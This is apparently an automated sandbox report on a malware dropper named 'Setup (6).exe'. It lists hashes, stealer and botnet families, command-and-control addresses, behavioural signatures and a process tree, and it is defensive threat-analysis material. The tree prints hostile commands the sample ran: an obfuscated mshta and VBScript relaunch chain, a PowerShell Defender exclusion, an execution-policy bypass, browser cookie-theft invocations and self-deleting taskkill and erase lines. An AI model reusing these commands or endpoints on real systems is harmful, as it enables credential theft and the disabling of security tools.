Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    196s
  • max time network
    1808s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (6).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 59 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 23 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 37 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 12 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Users\Admin\Documents\yuk0VhsSo0mmBzasaZqb1qXc.exe
      "C:\Users\Admin\Documents\yuk0VhsSo0mmBzasaZqb1qXc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:424
    • C:\Users\Admin\Documents\DqHQhSf76S1DwAJggqUuyvUs.exe
      "C:\Users\Admin\Documents\DqHQhSf76S1DwAJggqUuyvUs.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2564
      • C:\Users\Admin\AppData\Roaming\5307415.exe
        "C:\Users\Admin\AppData\Roaming\5307415.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1912
      • C:\Users\Admin\AppData\Roaming\5813699.exe
        "C:\Users\Admin\AppData\Roaming\5813699.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        PID:4252
        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
          4⤵
          • Executes dropped EXE
          PID:5132
      • C:\Users\Admin\AppData\Roaming\4225805.exe
        "C:\Users\Admin\AppData\Roaming\4225805.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:192
      • C:\Users\Admin\AppData\Roaming\2358980.exe
        "C:\Users\Admin\AppData\Roaming\2358980.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:5160
    • C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
      "C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:1212
      • C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
        C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
        3⤵
        • Executes dropped EXE
        PID:4684
      • C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
        C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4832
    • C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe
      "C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe"
      2⤵
      • Executes dropped EXE
      PID:3804
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 388
        3⤵
        • Program crash
        PID:4972
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 368
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3624
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 404
        3⤵
        • Program crash
        PID:4932
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 624
        3⤵
        • Program crash
        PID:2824
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 668
        3⤵
        • Program crash
        PID:5404
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 696
        3⤵
        • Program crash
        PID:5672
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 604
        3⤵
        • Program crash
        PID:5892
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 696
        3⤵
        • Program crash
        PID:6104
      • C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe
        "C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe"
        3⤵
          PID:9312
      • C:\Users\Admin\Documents\__SOWA8tRrakx_qXeUAW5YTt.exe
        "C:\Users\Admin\Documents\__SOWA8tRrakx_qXeUAW5YTt.exe"
        2⤵
        • Executes dropped EXE
        PID:2016
      • C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe
        "C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe"
        2⤵
        • Executes dropped EXE
        PID:2100
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
          3⤵
            PID:4396
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe" ) do taskkill -IM "%~nXW" -f
              4⤵
                PID:4472
                • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                  WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                  5⤵
                    PID:180
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                      6⤵
                        PID:5828
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                          7⤵
                            PID:4172
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                          6⤵
                            PID:6876
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill -IM "ecDLy1NDbln6v7JVsQfvOgI7.exe" -f
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1380
                  • C:\Users\Admin\Documents\eqfQXlwEgqjk3uuKF7no3C7p.exe
                    "C:\Users\Admin\Documents\eqfQXlwEgqjk3uuKF7no3C7p.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:736
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im "eqfQXlwEgqjk3uuKF7no3C7p.exe" /f & erase "C:\Users\Admin\Documents\eqfQXlwEgqjk3uuKF7no3C7p.exe" & exit
                      3⤵
                        PID:5584
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im "eqfQXlwEgqjk3uuKF7no3C7p.exe" /f
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5928
                    • C:\Users\Admin\Documents\kDaXHvvZVGDJV9I0suMAnWms.exe
                      "C:\Users\Admin\Documents\kDaXHvvZVGDJV9I0suMAnWms.exe"
                      2⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3684
                    • C:\Users\Admin\Documents\v1FwtFtx7XWd4dMYIyla_VJ1.exe
                      "C:\Users\Admin\Documents\v1FwtFtx7XWd4dMYIyla_VJ1.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      PID:3488
                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:4340
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          4⤵
                          • Executes dropped EXE
                          PID:1264
                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          4⤵
                            PID:6732
                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            4⤵
                              PID:6972
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                                PID:2764
                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4276
                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:4216
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                  PID:6968
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                  4⤵
                                    PID:7052
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                      PID:5972
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                      4⤵
                                        PID:6744
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:3692
                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                          4⤵
                                            PID:7088
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            4⤵
                                              PID:7512
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              4⤵
                                                PID:7612
                                          • C:\Users\Admin\Documents\vTUTBKxGdlQ0CJyNdqOMyuj4.exe
                                            "C:\Users\Admin\Documents\vTUTBKxGdlQ0CJyNdqOMyuj4.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3968
                                          • C:\Users\Admin\Documents\J0kuIvOhl8M2pMO7SzEbsSo1.exe
                                            "C:\Users\Admin\Documents\J0kuIvOhl8M2pMO7SzEbsSo1.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3472
                                          • C:\Users\Admin\Documents\zCh4Tv7wEG0G9HMSy90L0Gif.exe
                                            "C:\Users\Admin\Documents\zCh4Tv7wEG0G9HMSy90L0Gif.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3888
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0710604200.exe"
                                              3⤵
                                                PID:4552
                                                • C:\Users\Admin\AppData\Local\Temp\0710604200.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\0710604200.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5696
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4789867527.exe"
                                                3⤵
                                                  PID:7160
                                                  • C:\Users\Admin\AppData\Local\Temp\4789867527.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\4789867527.exe"
                                                    4⤵
                                                      PID:4776
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "zCh4Tv7wEG0G9HMSy90L0Gif.exe" /f & erase "C:\Users\Admin\Documents\zCh4Tv7wEG0G9HMSy90L0Gif.exe" & exit
                                                    3⤵
                                                      PID:5828
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "zCh4Tv7wEG0G9HMSy90L0Gif.exe" /f
                                                        4⤵
                                                        • Kills process with taskkill
                                                        PID:6584
                                                  • C:\Users\Admin\Documents\DYjacoNBWHXBSpX1yI4OpEUs.exe
                                                    "C:\Users\Admin\Documents\DYjacoNBWHXBSpX1yI4OpEUs.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1536
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 760
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4932
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 784
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1528
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 736
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5208
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 860
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5420
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 956
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5596
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 984
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5756
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1000
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5948
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1428
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4560
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1368
                                                      3⤵
                                                      • Program crash
                                                      PID:5436
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1384
                                                      3⤵
                                                      • Program crash
                                                      PID:4440
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1480
                                                      3⤵
                                                      • Program crash
                                                      PID:3808
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1052
                                                      3⤵
                                                      • Program crash
                                                      PID:6180
                                                  • C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe
                                                    "C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1820
                                                    • C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe
                                                      "C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe" -q
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:1916
                                                  • C:\Users\Admin\Documents\UGu9wlp0dLoN9BlhkUBwUwpp.exe
                                                    "C:\Users\Admin\Documents\UGu9wlp0dLoN9BlhkUBwUwpp.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1672
                                                  • C:\Users\Admin\Documents\YXUTGj1rbqe7ZaihyRKcm_e3.exe
                                                    "C:\Users\Admin\Documents\YXUTGj1rbqe7ZaihyRKcm_e3.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:1656
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 660
                                                      3⤵
                                                      • Program crash
                                                      PID:4324
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 672
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4860
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 680
                                                      3⤵
                                                      • Program crash
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4992
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 652
                                                      3⤵
                                                      • Program crash
                                                      PID:3624
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 1084
                                                      3⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3936
                                                  • C:\Users\Admin\Documents\S2adwB8YQHI5nIMuEbZ1PpBl.exe
                                                    "C:\Users\Admin\Documents\S2adwB8YQHI5nIMuEbZ1PpBl.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2324
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 488
                                                      3⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4512
                                                  • C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe
                                                    "C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:2560
                                                    • C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe
                                                      "C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:3448
                                                  • C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe
                                                    "C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2932
                                                    • C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe
                                                      "C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5436
                                                  • C:\Users\Admin\Documents\DYfaciGGjsxlUNH4QQaLfli1.exe
                                                    "C:\Users\Admin\Documents\DYfaciGGjsxlUNH4QQaLfli1.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:4596
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\DYFACI~1.DLL,s C:\Users\Admin\DOCUME~1\DYFACI~1.EXE
                                                      3⤵
                                                        PID:6476
                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\DYFACI~1.DLL,RDISVTQ=
                                                          4⤵
                                                            PID:6428
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\DYFACI~1.DLL
                                                              5⤵
                                                                PID:9112
                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\DYFACI~1.DLL,m148cQ==
                                                                5⤵
                                                                  PID:7724
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                    6⤵
                                                                      PID:7956
                                                                      • C:\Windows\system32\ctfmon.exe
                                                                        ctfmon.exe
                                                                        7⤵
                                                                          PID:6388
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpBA93.tmp.ps1"
                                                                      5⤵
                                                                        PID:7052
                                                                • C:\Users\Admin\Documents\Wr0qtdKR68nAMIsvlNReNhUZ.exe
                                                                  "C:\Users\Admin\Documents\Wr0qtdKR68nAMIsvlNReNhUZ.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4696
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-2I9DI.tmp\Wr0qtdKR68nAMIsvlNReNhUZ.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-2I9DI.tmp\Wr0qtdKR68nAMIsvlNReNhUZ.tmp" /SL5="$20248,138429,56832,C:\Users\Admin\Documents\Wr0qtdKR68nAMIsvlNReNhUZ.exe"
                                                                    3⤵
                                                                      PID:4888
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-UPO5M.tmp\Setup.exe
